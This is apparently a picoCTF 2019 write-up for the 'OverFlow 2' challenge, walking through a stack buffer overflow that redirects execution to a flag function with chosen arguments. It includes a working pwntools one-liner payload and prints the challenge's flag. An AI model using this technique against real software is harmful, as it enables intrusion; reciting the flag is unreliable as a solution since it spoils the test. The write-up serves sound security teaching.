# OverFlow 2

## Problem

> Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2\_2\_47d6bbdfb1ccd0d65a76e6cbe0935b0f on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/OverFlow%202/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/OverFlow%202/vuln.c)

## Solution

1. Find the offset/padding
   1. You can use the method described in [rop64](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/Binary/%20Exploitation/rop64/README.md) with the `cyclic` and `cyclic_find` or you can use the following
   2. Open vuln in [radare2](https://rada.re/r/) with `r2 ./vuln`
   3. Run `aaaa`
   4. Run `pdf @ sym.vuln` to get `var int local_b8h @ ebp-0xb8`
   5. The `0xb8` is the buffer location so 4 more bytes are needed to get past the "saved ebp register"
   6. So the offset is `0xb8+4`
2. Run `readelf -s vuln` to get the address of `flag`: `0x080485e6`
3. We can use `p32` from pwntools to convert the hex addresses to little endian. 
4. We need to pad out the second return address with `'a'*4` so that goes next in the payload
5. Now we can add the two function arguments in little endian using `p32`
6. Payload complete: `python2 -c "from pwn import *; print 'a'*(0xb8+4)+p32(0x080485e6)+'a'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln`

### Flag

`picoCTF{arg5_and_r3turn5ce5cf61a}`